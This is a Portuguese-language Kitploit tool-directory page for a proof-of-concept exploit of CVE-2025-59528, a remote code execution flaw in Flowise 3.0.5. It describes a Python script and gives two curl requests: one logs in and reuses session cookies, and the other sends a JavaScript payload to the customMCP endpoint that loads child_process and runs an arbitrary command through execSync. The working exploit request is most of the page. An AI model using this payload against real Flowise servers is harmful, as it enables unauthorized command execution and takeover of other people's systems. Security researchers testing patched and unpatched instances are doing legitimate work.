Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-59528-PoC — CVE-2025-59528 Prova de Conceito | Kitploit
Ferramentas/GitHubGitHub/mananispiwpiw/cve-2025-59528-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubmananispiwpiw/cve-2025-59528-poc

CVE-2025-59528-PoC

CVE-2025-59528 Prova de Conceito

Ver Repositório
137há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-59528 PoC

Script de prova de conceito em Python para acionar o caminho RCE CustomMCP do Flowise via POST /api/v1/node-load-method/customMCP.

⚠️ Apenas para fins educacionais e pesquisa de segurança autorizada. Executar esta ferramenta contra sistemas que você não possui ou sem permissão por escrito para testar é ilegal.

Créditos

  • im-soohyun (Kim SooHyun)

Detalhes

  • PoC para CVE-2025-59528
  • Versão afetada: Flowise 3.0.5
  • Versão corrigida: Flowise 3.0.6
  • Referência: https://github.com/advisories/GHSA-3gcm-f6qx-ff7p

Arquivos

  • poc.py: solicita a URL/IP da máquina, protocolo opcional quando apenas host/IP for informado, e-mail, senha e comando; faz login, reutiliza cookies e envia uma solicitação personalizada, exibindo o status HTTP, cabeçalhos e corpo da resposta de forma semelhante ao
Baixar ferramenta
CustomMCP
curl -i

Uso

Execute:

root@kitploit:~
python3 poc.py

Em seguida, forneça:

  • URL/IP da máquina, como 10.10.11.10, http://10.10.11.10 ou https://target.example
  • protocolo, se solicitado para host/IP sem protocolo
  • endereço de e-mail
  • senha de uma conta na instância do Flowise alvo
  • comando a ser executado no servidor

curl equivalente

1ª Requisição

root@kitploit:~
curl -i -X POST https://<MACHINE_URL/IP>/api/v1/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"<[email protected]>","password":"<password>"}'

2ª Requisição

root@kitploit:~
curl -i -X POST https://<target>/api/v1/node-load-method/customMCP \
  -H "Content-Type: application/json" \
  -H "x-request-from: internal" \
  -H "Cookie: token=<token>; refreshToken=<refreshToken>; connect.sid=<connect.sid>" \
  -d '{
        "loadMethod":"listActions",
        "inputs":{
          "mcpServerConfig":"({x:(function(){const cp = process.mainModule.require(\"child_process\");cp.execSync(\"<command>\");return 1;})()})"
        }
      }'